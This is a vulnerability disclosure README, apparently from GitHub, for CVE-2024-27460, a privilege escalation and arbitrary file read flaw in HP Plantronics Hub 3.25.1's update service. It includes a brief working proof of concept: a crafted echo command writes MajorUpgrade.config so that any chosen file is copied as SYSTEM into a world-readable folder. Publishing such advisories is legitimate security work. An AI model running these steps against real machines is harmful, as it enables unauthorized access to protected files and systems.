CVE-2024-27460

HP Plantronics Hub 3.25.1 Updater Privilege Escalation/Arbitrary File Read

Description:

HP Plantronics Hub 3.25.1 suffers from a bug that allows low privileged users to perform arbitrary file read as SYSTEM on the machine where the application is installed. Moreover, it is possible to abuse this flaw to escalate privileges to the SYSTEM user.

Affected versions

HP Plantronics Hub 3.25.1

Impacted service(s)

Insecure Path: "C:\ProgramData\Plantronics\Spokes3G"

Service: PlantronicsUpdateService

Steps to reproduce (POC):

Open cmd.exe
Navigate using cd C:\ProgramData\Plantronics\Spokes3G
echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
Desired file will be copied into "C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp", which any authenticated user has access to.

Discovered by:

Farid Zerrouk of Deloitte Belgium
Alaa Kachouh of Mastercard Europe

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

CVE-2024-27460

Description:

Affected versions

Impacted service(s)

Steps to reproduce (POC):

Discovered by:

Files

README.md

Latest commit

History

README.md

File metadata and controls

CVE-2024-27460

Description:

Affected versions

Impacted service(s)

Steps to reproduce (POC):

Discovered by: